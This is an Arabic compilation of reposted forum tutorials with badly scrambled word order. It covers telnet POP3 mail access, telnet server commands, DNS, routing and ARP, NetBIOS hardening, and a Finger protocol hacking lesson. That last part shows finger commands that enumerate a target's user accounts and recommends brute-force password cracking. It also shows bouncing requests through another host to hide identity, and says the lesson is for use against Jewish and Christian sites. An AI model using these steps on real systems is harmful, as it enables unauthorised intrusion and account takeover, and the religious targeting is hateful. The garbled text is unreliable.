البريد جلب في التلنت خدمة من نستفيد كيفأن يمكن ما لسبب المخصصة بالبرامج البريد سحب عليك تعذر إذ

سبب تكون قد التي الرسائل وحذف البريد لسحب التلنت تستخدميلي كما الطريقة و المشكلة

الشبكة مع إتصال على تكونتكتب Run ثم Start من إذا Telnet pop.mail.yahoo.com 110 ثم طبعا

وجود مالحظة مع الخاصبك الحساب اكتب أو الياهو مع حسابك كانالرقم و الثانية الجملة و االولى الكلمة بين فراغ

الدوساكتب مثل نافذة لك اسم user ستظهر بعدها اكتب ثمعلى تشاهده ال ستكتبه الذي أن مالحظة مع بريدك في المستخدم

مثل تهتم ال إنتر user xxxx النافذة ثماكتب ذلك مثل pass بعد السري الرقم اكتب إنتر pass xxxx ثم ثم

كلمة ستشاهد صحيح إدخالك كان إنتر Ok إذا تضغط ما بعد

الحساب إلى إدخالك سيتماكتب وأحجامها الرسائل جميع إنتر Listلمشاهدة ثم

يدل ثاني رقم رقم كل بعضوأمام تحت الرسائل ترتيب ستشاهدالرسالة حجم على

اكتب القائمة من رسالة الهدف dele لحذف الرسالة رقم ثمبريد مع الطريقة هذه  pop تنفع

الفنتوخ الدكتور من التلنت طريق عن البريد سحب طريقةالتلنت مع المستخدمة  بعضاألوامر

بعيد جهاز مع التلنت عميل وصلالجملة  بناء

open [\\RemoteServer] [Port]المعلمات

\\RemoteServer  . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد

المحلي الملقم  .افتراضPort 

. سيتم ما، منفذا تحدد لم إن استخدامه تريد الذي المنفذ تحديداالفتراضي المنفذ  .افتراضمالحظات

إلى األمر هذا اختصار  .o يمكنكأمثلة

بعيد بملقم المنفذ Redmond لالتصال رقم خالل اكتب 44من ، :o redmond 44

عميل تصال بعيد Telnet لقطع كمبيوتر منالجملة  بناء

close [\\RemoteServer]المعلمات

\\RemoteServer  . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد

المحلي الملقم  .افتراضمالحظات

إلى األمر هذا اختصار  .c يمكنك

أمثلةبعيد ملقم من االتصال Redmond لقطع ، :اكتب

c redmond 44

عميل أوامر Telnet إلرسالالجملة  بناء

send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]المعلمات

\\RemoteServer  . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد

المحلي الملقم  .افتراضao 

اإلخراج أمر  .إحباطayt 

أمر  ."?Are you there" إرسالesc 

الحالي الهروب حرف  .إرسالip 

العملية أمر  .مقاطعةsynch 

تزامن عملية  .Telnet أداء

لعميل الحالية اإلعدادات Telnet لعرضالجملة  بناء

display المعلماتبال

مالحظاتاألمر لعميل display يسرد الحالية التشغيل كنت .Telnet معلمات إذاعمل جلسة ( Telnet في بملقم متصال كنت إذا أخرى، ،)Telnet بعبارة

عمل جلسة من الخروج بضغط Telnet يمكنك المعلمات لتعديلCTRL+]. عمل جلسة إلى Telnet للعودة ،  .ENTER اضغط

بالـ المحلي التلنت ملقم  tlntadmn إدارةملقم يشغل كمبيوتر Telnet إلدارة

الجملة  بناءtlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]

المعلمات\\RemoteServer 

. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم  .افتراض

start ملقم تشغيل  .Telnet بدء

stop ملقم تشغيل  .Telnet إيقاف

pause ملقم  .Telnet مقاطعةcontinue 

ملقم  .Telnet استئنافمالحظات

ملقم يشغل بعد عن كمبيوتر إدارة األوامر Telnet يمكنك باستخدامtlntadmn نفسنظام يشغالن الكمبيوتر جهازي من كال كان إذا

ويندوز المطلوب فإذا ويندوز 2000التشغيل بي ال. 2000استخدمه األوامر استخدام يشغل tlntadmn يمكنك بعد عن كمبيوتر إلدارة

Windows 2000 وملقم Telnet يشغل كمبيوتر  .مثال Windows XP منملقم يشغل كمبيوتر على االتصاالت لعدد األقصى الحد لتعيين

Telnetالجملة  بناء

tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]المعلمات

\\RemoteServer  . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد

المحلي الملقم  .افتراضmaxconn=PositiveInteger 

. العدد هذا تحديد عليك يجب لالتصاالت األعظمي العدد تعيينمن أصغر موجب صحيح عدد ماليين 10بواسطة . 

على الفاشلة الدخول تسجيل لمحاوالت األعظمي العدد لتعيينملقم يشغل Telnet كمبيوتر

الجملة  بناءtlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]

المعلمات\\RemoteServer 

. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم  .افتراض

maxfail=PositiveInteger المسموح الفاشلة الدخول تسجيل لمحاوالت األقصى الحد تعيين

. صحيح عدد بواسطة العدد هذا تحديد عليك يجب للمستخدم بهامن أصغر 100موجب . 

يشغل كمبيوتر على العمل جلسات خمول أجل من المهلة لتعيينTelnet ملقم

الجملة  بناءtlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]

المعلمات\\RemoteServer 

. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم  .افتراض

timeout=hh:mm:ss والثواني والدقائق، بالساعات، المهلة فترة  .تعيين

الـ يستخدم األوامر ?/ دائما موجه في التعليمات ..لعرض8. الـ " عن " DNSمعلومات

> إعصار منتدى من >منقول> Dark Devil :الكاتب<

معا اتفاق نعقد دعونا نبدأ ان : قبلهكر لكلمه توصلنا التى االشياء تعلم فى لنبدأ و هكر كلمه فلننسا

سب هورسساو تروجن ليسمعنا الهكر طبعا و الكلمه بمعنىالخ ..... سفن

اليونكسو اللينكسو مثل التشغيل نظم تعلم هو الحقيقى الهكريكون التى البرمجه بعضلغات بجانب المواقع تصميم لغات تعلم

السى لغه هى مجالنا فى  C اهمهاالمفيد فى التكلم لنبدأ و الخالبيط هذه كل من دعونا االن :و

هى ما نعرف ال لكن و كثيره اشياء عن نسمع بعضاالحيان فى نحننتكلم الملفسوف هذا فى و هى ما نعرف و نكتشف ان نحاول ال و

يعرف ال معظمنا لكن و كثيرا عنه نسمع شئ  عنهو : ما

ال هو الشئ هذا :DNS وال لكن و الكثيرين يسمعه الذى االسم هذا عن بالتحدث نبدأ سوف و

هو ما : يعرفوننفسه بالسؤال لنبدأ  و

==================================================

=========================ال هو ?DNS ما

==============لكلمه DNS : اوال اختصار سرفر . Domain Name System هو يتصل وبورت DNS ال على احد 53عادتا الى االتصال اردت اذا انك يعنى مما

ال استعملت و تتصل DNS المواقع فسوف  حقهالبورت طريق عن ال 53به يحول او يترجم سوف و translates

alphabetical hostnames مثل الموقع اسم يعنى و:http://www.burn.com/ الى IP ADRESSES العكس 127.0.0.1مثل و

العمليه تتم عندما و صحيحمباشره بالموقع  تتصل

تسمى هذه التحويل عمليه تحليل address resolution و او تحويل اىالى الموقع به IP عنوان االتصال العكسلنستطيع  او

ال ظهور قبل ال DNS و لعمليه اخر اسم و. address resolution كانال ظهر قد من DNS لكن بكثير الهوستساسهل توزيع لجعل

من انه حيث  الماضىاربعه تتذكر ان من افضل تريده معين موقع اسم تتذكر ان السهل

االرقام من . )IP( خاناتال ل المستعمل االسم كان ال address resolution و كان DNS قبل

ال اسمه ملف من اسماء HOST FILE يتكون عن عباره كان والمواقع  الهوستساى

ال عنواوين رعايته IP و تتولى الملف هذا كان و بهم الخاصهStanford Research Institute's Network Information Center )SRI-

NIC(. ان الراعى هذا على كان وبالعنواوين )UPDATE( يجدد يمده و اسبوع كل حوالى هذا الجدول

هو يجدد ان ادمين السيستم على و ظهرت التى االرقام و الجديدهاو ملفه  االخر

ال اتصال طريق اى FTP عن الراعى بين و .SRI-NIC بينهفى النظام هذا بدأ السريع و الرهيب النترنت تطور مع طبعا و

فى التحكم يستطيع الذى االمثل النظام عن يبحثون بدأو و الفشلبى االى و الهوست

ال ظهر طبعا و دقه و بترتب و بسرعه و واحد وقت فى DNS معاذلك .ليفعل

ال اى DNS و مركز ماكينه decentralized ليسله ليسهناك انه اىال كل فى يتحكم معين سيستم بالعكسفال DNS او عباره DNS بل

بيز داتا عنسرفر كل و مختلف سرفر كذا على توجد و منظم بشكل موزعه

معينه DNS عليه معلومه على يحصل ان يريد عندما يبحث اين يعرف

معين هوست .اوال عن عامه لمعلومات بالنسبه قبل DNS هذا النظام كان كيف و

القديمه االنترنت حركه عن عامه نظره ايضا هى و . اكتشافه

THE DNS SERVER:================

نظام DNS SERVER ال على عادتا يعمل و كمبيوتر عن عباره هوUNIX اليونكس برنامج يستخدم باليونكسو الشبيهه النظم BIND اوهذه .)Berkeley Internet Name Domain( اى مثل برامج ايضا يوجد و

ايضا الماكنتوش و للويندوزك استعمالهم احد اراد ال DNS SERVER اذا يفضل الكل لكن UNIX و

.ال برنامج يتكون جزئين DNS و : من

the name server itself )the daemon program that listens to port 53( يسمى االخر RESOLVER و

ال تطلب NAME SERVER و عندما متصفحك الى يستجيب هذاتطلب او تكتب و اكسبلورر االنترنت تفتح عندما فمثال معينه معلومه

مثل معين موقه  منهhttp://www.burn.com/  اقرب المتصفح و ) DNS فسيسئل له موجود

) عن الخاصبك بى االى رقم و بالشبكه اتصالك على يعتمد هذاال /http://www.burn.com ل IP عنوان

ال هذا يحتاج المتصفح الهوست IP الن هذا لديه الذى السرفر ليجدلك ليعرضها السرفر من الموقع محتويات يطلب و الموقع هذا اى

متصفحك .فىال سيسئل هذا قبل ذاكره daemon program و فى اى جداوله فى

سبق ما الى ينتقل يجده لم فأذا تطلبه الذى الموقع عن متصفحكالعمليه تتم هكذا و .شرحه

THE TREE INFORMATION:======================

رقم تطلب عندما انك على اتقفنا ان بعد اصدقائى االن معين IP وال فى يجده ال و حقك المتصفح الخاصبك DNS من اى المحلى

ال يسأل ليجده DNS SERVER سوف عنه المستوى فى منه االعلىو اعلى مستوى فى للبحث فينتقل اعلى مستوى فى يجده لم اذا و

ال مستويات فى االعلى الى االقل من البحث يسير هكذا و اعلىDNS SERVERS.

و اتصال شجره وجود فنستنتج االتصال هذا من نتيجه طبعا وبالضبط تعمل كيف لكن و  معلومات

مثال نأخذ : دعوناال ان فرضنا مثال ISP لو كان على isp.co.uk الخاصبك يعتمد هذا و

عليه تشبك الذى السرفر و الشركه حسب اى باالنترنت اتصالكال يكون ان طبعا الطبيعى مثل ISP's DNS server's hostname فمنال dns.isp.co.uk هذا هذا سألت انك فالنفرض االن ليبحث DNS و

عن  /http://www.burn.com الخاصب IP لك ال هذا فسيقوم مثالdns.isp.co.uk عنده الذاكره فى المخذنه المحليه جداوله فى بالبحث

ال من اعلى مستوى الى قلنا كما فسينتقل يجدها لم اذا و فيجدهاDNS SERVER االعلى المستوى فى ايضا يجده لم اذا و فيه ليبحث

من فمثال كليا البحث مكان بتغيير يقوم ان الى dns.isp.co.uk فعليهsome-organization.org.uk او school.edu.uk, university.ac.uk,

england.gov.uk, airforce.mil.uk كل و طبعا كثيرا امثله هناك و الخ و

ينتهىب له UK شئ المتاح االماكن كل فى ايضا يجده لم اذا واكبر الى المتصفح فسيرجع فيها و DNS البحث الشبكه على موجود

ال ال ROOT اسمه عناوين كل على يحتوى للمواقع IP فهو كل علىاى على .DOMAIN NAME الموجوده

When and why does DNS "hang" or fail?======================================

لل ايضا يمكن ال . DNS و كان اذا سريع او بطئ يكون الخاص ISP انال على يحنوى من IP بك اجزاء الى فقط يحتاج فسوف طلبته الذى

. المتصفح انتقل اذا اما متصفحك فى يعرضه و لك به ليأتى الثانيهال من اعلى مستوى فى من DNS للبحث قليال الى يحتاج فسوف

حتى يمتد رساله . 15الوقت تأتيك سوف يجده ال انه حاله فى و ثانيه تقول متصفحك نتيجه address could not be found من يحدث هذا و

المتصفح فهو IP او HOST اعطاء طبعا بالتالى و عنه ليبحث خطأفيقوم البحث طول نتيجه او ليعرضه االساس من ليسموجود

ال مع االتصال بقدان عمليه DNS متصفحك . TIMED OUT اىعلى المتصفح فى نضغط الحاله هذه فى و

او&@#&@#&@#&@#&@#&@#&@# RELOAD حسب طبعا. متصفحك

عن بعيده هى التى المعلومات بهذه جميعا افدتكم قد اكون ان ارجولكم قلت كما و اصدقائى يا الهكر تعلم اساسفى لكنها و الهكر

و البرمجه اساليب تعلم هو الهكر الباتشات و التروجان ليس الهكرو االنترنت عالم فى جديد شئ كل معرفه و المواقع تصميم كيفيه

االخطاء تصحيح و الموضوع قرائه و الدخول المحترفين من ارجوو االخطاء من خالى متكامل و كامل موضوع يكون حتى به التى

على موجود انا سؤال اى و المعلومات مع تفاعلكم و ردودكم نتظرمقدرتى  قد

ال عن معلومات هو و القادم موضوعى انتظرو ما SSL و سنعرف وبالتفصيل  هو

بركاته و الله رحمه و عليكم السالم .و،،،انتهى

" Routing in the Internet معلوماتعن "> إعصار منتدى من >منقول

> Dark Devil :الكاتب<بركاته و الله رحمه و عليكم  :السالم

الكثير و الشبكات علم فى مهم شئ عن اصدقائى يا نتكلم سوفال هو الشئ هذا و به علم غير على  .Routingمنكم

منه تستفيدون و الموضوع يعجبكم ان اتمنى و نبدأ دعونا االن  :وRouting in the Internet: 

========================= what is routing?! 

تنتقل طريقه عن الذى ميكانزم او تكنيك عن عباره هو الروتنجاخر الى هوست من او اخر الى كمبيوتر من  .المعلوماتوهم الروتنج من مظاهر ثالث يوجد االنترنت سياق فى  :و

1-Physical Address Determination 

2-Selection of inter-network gateways 

3-Symbolic and Numeric Addresses 

ال داتا تنتقل عندما المهم هو االشياء هذه فى االول يعتبر من ipوبال. الخاصه الداتا هذه نغلف ان الدرورى فمن أطار ipالكمبيوتر بأى

ورك بالنت او للجهاز المحليه ورك بالنت متصله تكون صيغه اى من. و الداتا هذه انتقال عند عليها الموجود حالته فى الجهاز بها المتصل

او المحليه ورك النت عنوان ال من التضمين الغالف هذا يتطلباى بالبيانات يحيط الذى االطار مع للشبكه لهذا الفيزيائى العنوان

)inclusion of a local network address or physical address within the *****(. 

االنترنت الن درورى و ايضا مهم اعاله المذكور من الثانى الشئ واى وركسالمحليه النت من عدد من مربوطه local networks تتكونال اى المداخل من كثير او .gatewaysبواحد عموما المداخل هذه و

ال بالروترساى , routersتسمى او فيزيائيه اتصاالت لها يكون احياناو . المالئم المدخل تحديد و وركس النت من الكثير مع بورتات

ال داتا لتفصيل اى ipالبورت روتنج نسميه ما تتضمن routing هذا ومعينه بطرق المعلومات تبادل داخل  .ايضا

ال اى العنوان انتقال يتضمن الذى هو المذكور من الثالث addressوtranslation عليه التعرف نستطيع و نعرفه الذى الكتابى الشكل من

المتصفح عنوان مثال المقصود و بسهولهصعبه ip الى /http://www.burn.com اى معقده رقميه اشياء الى اى

ال طريق عن المهمه هذه تؤدى ( DNS و موضوعى مراجعه ارجوال عن اكثر DNSاالول  .) لالستفاده

ال تحديد عمليه شرح فى ندخل االن  : اى Physical AddressوPhysical Address Determination: 

=============================== ينقل ان كمبيوتر جهاز يريد كان ان ip data اذا الى يحتاج فأنه اذن

. هذا لنجاح و بها الجهاز المتصل للنتورك تابع مخصصو بأطار يغلفيسمى ما نحدد ان الدرورى من االطار بهذا الغليف ظل فى االنتقال

. physical addressبال ببساطه و بنجاح يتم هذا و الكمبيوتر ألتجاهال تحويل كيفيه يوضح سوف جدول استخدام طريق الى ipعن

physical addresses , ال عناوين على يحتوى الجدول هذا ipفمثاللها المعروف العنوان او االدرس  . للنتوركسو

يكون ان الطبيعى من قرائته و الجدول هذا على للحصول وو الجدول هذا على للحصول معين بروتوكول يستخدم الكمبيوترال بأسم physical addresses الى ipتحويل يعرف البروتوكول هذا و

ARP اى Address Resolution Protocol االدرس تحليل بروتوكول اىال تحويل كلمه معنى فهمنا و ادركنا االن اننا اعتقد الى ipو

physical addresses , بأسم الجدول هذا نعرف ان يمكن ARP وcache . 

امر نستخدم الجدول على للحصول اليونكسايضا arp -a و فى ونفساالمر  .نستخدم

االمر تنفيذ بعد يظهر الذى الجدول على جهازى من حى مثال هذا و: 

C:\WINDOWS<arp -a 

Interface: 62.135.9.102 on Interface 0x2 Internet Address Physical Address Type 207.46.226.17 20-53-52-43-00-00 dynamic 213.131.64.2 20-53-52-43-00-00 dynamic 

213.131.65.238 20-53-52-43-00-00 dynamic 

الشبكات كل عناوين هى هذا امامكم الموجود ادرس االنترنتاالنترنت الى دخولى بعد بجهازى  المتصله

ال بهذا Physical Addressو و يتغير ال ثابت انه تالحظون انكم اعتقدال ان لكم نوضح و نقول ان ال Physical Addressيمكننا هو Mac هذا

Address العمل اثناء النتوركس به تتصل الذى نفسه الجهاز رقم اىال تحديد ان كالمى فى قلت فقد لذلك مهم Physical Address و

ال داتا او معلومات نقل عمليه فى بدون ipجدااا Physical النهAddress ال فى الباكيدجسالموجوده فكيفستتعرف routerاذن

طريقها  .علىال مكتوب type و يتغيير dynamic هذا انه بمعنى ثابت غير انه اى

العمل اثناء يثبت لكنه و الجهاز فى مره لكل ريستارت عمل عنداالنترنت  . على

ال هو و االخر النوع هناك فقط " staticو هذا يتغير ال الذى الثابت اى "للتوضيح

هى ما و الروتنج هو ما بسيط بمعنى فهمنا اننا االن اعتقدroutersال،،،انتهى

" NETBIOS "> نورة موقع من >منقول

على قادر ستكون الموضوع هذا قراءة بعدالخالية • الجلسات  صد

المستخدمين • تعداد  منعالـ • تعداد  SNMPمنع

على اعتماد للويندوز االفتراضي اإلعداد في وهي NetBIOS يوجدالـ ألن المهمة الشبكات ألصحاب كبيرة واجهات NetBIOSمشكلة لهاالمنفذ API تداخل خالل الهدفمن حول معلومات وترجع 139تعيد ، TCPلـ من حتى ممكن الوصول يكون االفتراضية الحالة وفي

عند كبير يكون قد خطرا فيه يكون هذا وطبعا ، الهوية مجهولينأنظمة على الولوج محترفين من NT استخدامه

خدمات كل تلغي أن أنها NetBIOS تستطيع تجد عندما ما جهاز علىخصائص من ذلك ويكون لك ظرورية من TCP/IP غير Advanced ثم

التبويب من التالي WINS ثم المثال في الواضح الخيار على تعلم  ثممايكروسوفت قدمتشركة فقد لك مهمة الخدمة هذه كانت وإذا

تدعى وهى مناسبا كبير RestrictAnonymous حال بشكل تحد وهيالوصول وتستطيع ، المجهولة الوصالت عبر المعلومات تسرب من

من من Administrative TOOLS إليها ثم Local Security policy ثمنختار النافذة من Local poicies من نعلم security options ثم ثم

األول الخيار Additional restrictions for anonymous علىconnections نختار االيمن بالزر من security ثم نختار النافذة من ثم

الخيار المنزلق No Access Without Explicit Anonymous الشريطPermissions 

الـ أدوات إلستخدام NetBIOSبعضاألمثله Net View

اوامر سطر أداة وهي نفسه التشغيل نظام ضمن مضمنه األداة هذهعلى NT/W2000 على االجهزة وكل المتاحة الميادين تعرض وهي

ويكفي ، األجهزة على لتشارك المتاحة الخدمات وكل الميادين هذهعنوان تكتب ما IP أن على حصلت قد تكون حتى الدومين اسم أو

تريداألمر إستخدامات عن المزيد انقر Net ولمعرفة الشبكة إدارة  . في

بنفسالعمل تقوم االنترنت على المتاحة بعضاألدوات وتوجدالمدعوه األداة هذه منها احترافي اداة Nbtscan بشكل أيضا وهي

من تحملها أن وتستطيع أوامر ... سطرمن ميسر شرح  ... ولمشاهدة

بنفس للقيام االنترنت على كثيرة شعبية رسومية أدوات وتوجدالبرنامج المثال سبيل على منها  ، Legion العمل

المريح الحلمن المقدمه المنافذ حماية هو الصداع هذا لتخلصمن المريح الحل

البروتوكول TCP البروتوكول من UDP و المنافذ المنفذ 135عبر إلى خاللها 445 +139 من تستطيع المتقدمة النارية الجدران برامج وكل ،

الخدمة نلغي كيف وشاهدنا ، مريح بشكل بالمنافذ تتحكم أنNetBIOS الزال ذلك كل ورغم ، منها المحتمله المشاكل من نقلل أو

البروتوكول تستخدم كنت إذا موجودا الشبكة SNMP الخطر إلدارةويندوز المعلومات 2000على كل يمرر البروتوكول فهذا ، سيرفر

المطلوب بالشكل البروتوكول هذا ولتأمين ، مثبتا كان إذا المطلوبةاالول خيارين  أمامك

المجموعة اسم االفتراضي Public حذف التثبيت عند تكون التيالمثال في كما الشبكة مستخدمين من مخصصة أسماء وتكون

الزر public المجموعة من ثم عليها علم حرر ****Re موجودة ثم Send authentication trap المربع

لألشخاص البروتوكول هذا استخدام حصرت قد تكون بذلكفقط المختارين

السجل محرر من الثاني  regedit والحلHKEY_LOCAL_MACHINE\system\currentControlset\servec es\

SNMP\parameters\ExtensionAgentالمفتاح بحذف قم ترقيم LANManagerMIB2Agent ثم بإعادة قم ثم

من = ليبدأ الترقيم أعد واحد رقمه حذفته ما كان ذا إ مثال المدخالترقم للمدخل 2واحد

البروتوكول أن تعلم بدون TCP/IP هل سليم بشكل العمل يستطيعالـ ، NetBIOSخدمات أفضل تعطيله إليه محتاج غير كنت إذا لذلك

،،،انتهى

خدمة " "Finger بروتوكول> اإلسالمية الحزم شبكة منتديات من >منقول

>LAMeR :الكاتب<وبركاته الله ورحمة عليكم  السالم

خدمة بروتوكول الدرسعن هذا مني تتقبلون انكم Finger اتمنىبورت على تعمل 79التي

الدرس نبدأ الله بسم

الدرس فهرسمحتويات>================<

تبرئة 1.1عن 1.2 Finger مقدمةFinger استخدام 1.3

خدمة 1.4 استخدام عند الخدع Finger بعضبأستخدام 1.5 موقع طريق عن Finger األستعالم

الدرس 1.6 هذا من األستنتاجالختام 1.7

:تبرئة 1.1>=========<

والنصاري اليهود مواقع على والتطبيق للتعليم الدرسفقط هذاللمسلمين  الضاره

الدرسضد لهذا السيء لالستخدام مسؤولية اي يتحمل ال فالكاتبالمسلمين .أخواننا

عن 1.2 Finger مقدمة>===================<

البورت Finger إن طريق عن تعمل خدمة وكانت 79ديمون عادةكنوع أصال للناس businesscard مستخدمة .رقمي

البعيد إلى ) remote user(المستخدم طلب يرسل أن Finger يمكنمعين نظام على يجري ديمون

79نوعية Finger بورت( إجابة ) على .وسيحصل

أيضا و النظام هذا على المستخدمين هم من ستخبرك اإلجابة هذهبالنظام المتصلين المستخدمين هؤالء عن المعلومات .بعض

, أيضا تخبرك اإلجابة األحيان أغلب في المعلومات هذه إلى إضافةالنظام يدير الذي باإلتصال )admin(من قام .وكيف

العالم في األنظمة انواع جميع على الناساألتصال استخدم قديماالـ و األنظمة هذه عن األستعالم يعطيهم Finger وطلب كان

 معلوماتعن هذا في حسابات لهم وهل النظام في الموجودون هم من

وكان. في Fingerالنظام قديما يستخدمأيضا الكبيرة الشركات و .الجامعات

الـ ، الماضي في Finger في الطالب طريق عن عامة إستعمل الجامعات

نفسالجامعه في اخرين تخصطالب معلومات ارادوا اذا

األجابة تكون ما " !Finger me " بجملة ) Finger Deamon اجابة( وكثيراأعلمني " " ! اي

اصبح العالمية اإلنترنت شبكة وجود ومع اآلن Finger أمااآلن توجد ألنه ، شهرة أقل

عمل كبطاقة للعمل الويب خاصة )bisinesscard(مواقع رقميةالناس مالحظة وبسبب األنترنت بمستخدمين

خدمة استخدام قل األلكتروني لألمن الواسع Finger التهديدDeamon

حال أية ،علىالمواقع بعض وستجد الخدمة هذه منعت األنظمة ليسكل

) الخدمة) هذه تقدم األنظمة . بأستخدام األنظمة اختراق بمحاوالت الهكرز يقوم األيام وهذه

 برامجportscans . . . أساسعلمي أي بدون المفتوحة البورتات عن . للبحث

إن لخدمة Finger لذلك عظيم مثال ديمون،المعلومات من ضخمة بكمية لتزودك قانونيا استخدامها يمكن

الحساسةهدف .حول

مفهومة بلغة الدرس هذا في اشرح ان أحاول سوف  لهذاهو في Finger ما استخدامه يمكن وكيف يفعل وماذا ديمون

 مصلحتك

: خدمة ان المقدمة تستخدم Finger الخالصة والزالت قديما كانتعن المعلومات  لجلب

هذا في حسابات لديهم هل و النظام في الموجودين المستخدمينال ام . النظام

النظام : معلومات ) server (مالحظة فيه تخزن كمبيوتر جهاز هوالمواقع استضافة في ويستخدم  هائلة

Finger استخدام 1.3>=================<

مثل المعروفة السكان برامج من اي استخدام ) superscan( عند للبحث

معين موقع منفذ ) /http://www.foobar.com مثال( في به ووجدت)Port مفتوحا 79 )بورت

ان يعني /http://www.foobar.com هذايعمل Finger له .ديمون

بـ نقوم كيف استعالم؟ )request(اآلن  طلبوندوز طريق عن

زبون يوجدبه ال وندوز األحيان أغلب للـ )client( في Finger خاص ) installed ( مركب

نستخدم سوف لـ Telnet لذلك  Finger كخادم

--توضيح--Telnet)client( --------request-------< Finger Deamon)in Server( o

الدوس موجة في اآلتي السطر كتابة طريق : ) MS DOS( عن

telnet http://www.foobar.com/ 79

برنامج لك سيظهر ذلك األوامر telnet بعد تطبع منه  . و

يونيكس من امالينوكس بنظام يوجد ألنه تيلنت نستعمل أن إلى بحاجة لسنا)client(زبون بخدمة  Finger Deamon خاص

تقريبا دائم بشكل النظام على .مركب

الدرسلمستخدمي ::: نهاية حتى التالي الشرح سيكون مالحظةبأستخدام األستمرار قررت أذا  لينوكسأما

التلنت في الدوسثم موجه في األوامر كتابة ستكون وندوزالتي األوامر نفسها األوامر كتابة  وستكون

ثم "@" " مسافة نضع بدل لينوكسولكن نظام بأستخدام تنكتبwww" الموقع اسم مراعيا الوندوز  في

لينوكسهكذا في األوامر كتابة يكون  : مثالfinger@anyname.com هكذا سيكون وندوز في  : ولكن

finger http://www.anyname.com/ بين المسافة  www و finger الحظ

يونكس في األوامر محث في تستخدم ( اطبع انك افتراض unix علىshell ( :

finger@foobar.comهم ) من معرفة مثال عنه المراداألستعالم الموقع الهدف ان الحظ

هو ( هنا كمثال /http://www.foobar.com مستخدمينه

:فستظهرالنتائج

Login: Name: Tty: Idle: When: Where:

root foobar sys console 17d Tue 10:13 node0ls3.foobar.comAmos Amanda >.......< >.......< >.......<

Anderson KennethBright Adrian

Doe JohnJohnson Peter >.......< >.......< >.......<

Mitnick KevinMunson GregOrwell Dennis

النتائج؟ هذه تعني ماذا اآلناألول العمود ) login ( في الثاني وفي المستعملين أسماء نرى

)Name( " الحقيقية ،"األسماءحقيقة الوقت معظم في لكن حقيقية، ليست بالطبع .التي

الثالث العمود )Tty( يرينا الطرفي  the terminal type النوعالتوقف )Idle( والرابع .the idle timeفترة

الخامسوالسادس العمودين في ذلك وبعدبالنظام لألتصال الحساب فيه استخدم الذي والمكان .الوقت

الخاصة .. الخ هواتف وأرقام األيميالت بعنواوين أعمدة توجد أحياناالنظام هذا  بمستخدمين

معين مستخدم عن المعلومات من المزيد تريد كنت Johnson( إذاPeter جونسن بيتر

) التالي األمر أدخل المثال سبيل :على

finger johnson@foobar.com

خدمة 1.4 استخدام عند الخدع Finger بعض> =========================

===========<

لخدمة الرئيسي الضعف ما شاهدت اآلن .Finger أتمنىFinger deamon النظام على الموجوده الحسابات ماهي .يريك

قانوني ) ( طريق عن تكسب أنك يعني المجموعة % 50هذا من وهي السحرية

/ الدخول ستمنحك التي المستخدمين أسماء مجموعة السر كلمات)Access( نظام  .إلى

متوقفه القادمة الخطوة ستكون المستخدمين، أسماء عرفت إذابرنامج أو bruteforce على

الباسوورد تخمين برامج آخر  worldist password cracker بمعنى

المثال سبيل على للتيلنت كتبت خاصة سكربتات هناكلموقع  /http://www.thehackerschoice.com اذهب ابحثعن  أو

VLAD's pwscan.pl

ملفنصي في السر بكلمات قائمة تكون ان عليك يجب word( لذلكالمفكره  )او

لم وإذا المستخدمين أسماء من السرقريبة كلمات تكون ان وحاولالقائمة تعمل

برنامج - bruteforce استخدم كأس لك تحظر ان الوقت بهذا أنصحكاستراحة لك وتأخذ  شاهي

عمله يعمل البرنامج -وتجعلمن اهمية اكثر للنظام للمستخدمين الحسابات بعض نجد بالطبع

الحسابات من .غيرهااإلدارة حساب الجذر )Admin( وخاصة تعرف )root(أو عندما انه بسبب

الخاصبهم  الباسووردالحساباتسهلة . بعض وبالطبع بالموقع التحكم تستطيع وقتها

السر كلمة . تخمين . سبيل على الحسابات من النوع هذا لمعرفة الخدع بعض هناك

المثالاألمر :إطبع

finger secret@foobar.com

الي األمر هذا ترسل جميع Finger Deamon عندما سيعطيكالحسابات

كلمة على تحتوي اإلسم "secret" التي أو المستعمل اسم في أما.الحقيقي

تستعمل أن يمكنك أنت حسنا هذا؟ في المهم الشي ماهو "test" اذا،0000أو " "temp" أو "

من من "secret" بدال هذاالنوع يكون ان المحتمل من تعرف وكما الحسابات

األحيان أغلب في باسوورداته معرفة .سهل

finger .@foobar.com

finger 0@foobar.com

يحدث ما وشاهد األوامر هذه !جربعلى التعرف Finger Deamon حاول ، بنفسك RFCأقرأ خدعك !وأوجد

بأستخدام 1.5 موقع طريق عن Finger األستعالم> =========================

=============<

خدمة استخدم ان أردت " Finger معنى( Finger إذا ألمس " كفعلاستعلم " بمعنى هنا تأتي )"ولكنها

هذا مثل معين موقع عن "www.victim.com"واألستعالمآخر موقع أن تعرف خدمة "www.host.com" وأيضا Finger يقدم

،تعملهذا مثل طلبا أقدم ان يمكنني األوامر عندها محث في اكتب هذا )مثل

finger@host.com@victim.com

Host.com يستعلم )Finger( اآلن victim.com النتائج  .ويريكلدى مجهول ستكون انك الطريقة هذه من victim.com أحدالفوائد

تقوم /http://www.victim.com فعندما في /http://www.host.com ستشاهد )logالدخول( بطلبسجل

منك بدال . سجالتهم،تترك ان يمكن أنك وهي اخرى طريق ( يقوم )موقع( Host فائدة عن

) Finger خدمة حاسوبا عن باألستعالماألستعالم هذا انت طلبت اذا بينما ، نفسالشبكة على آخرا

خدمة جهازك Finger بأستخدام منالمستعلم لدى به موثوق غير سأكون ألنك لك مسموحة تكون لن

عنهباستخدام لألستعالم الطلب كان اذا موقع Finger بعكس طريق . عن

حاسوبك : يعتبر عنه األستعالم تريد الذي الموقع ان الخالصة يعني

بعكس به موثوق غير  الشخصيله يسمح فسوف يشابهه اخر موقع طريق عن األستعالم كان  .! اذا

1.6 الدرس هذا من األستنتاج>=======================<

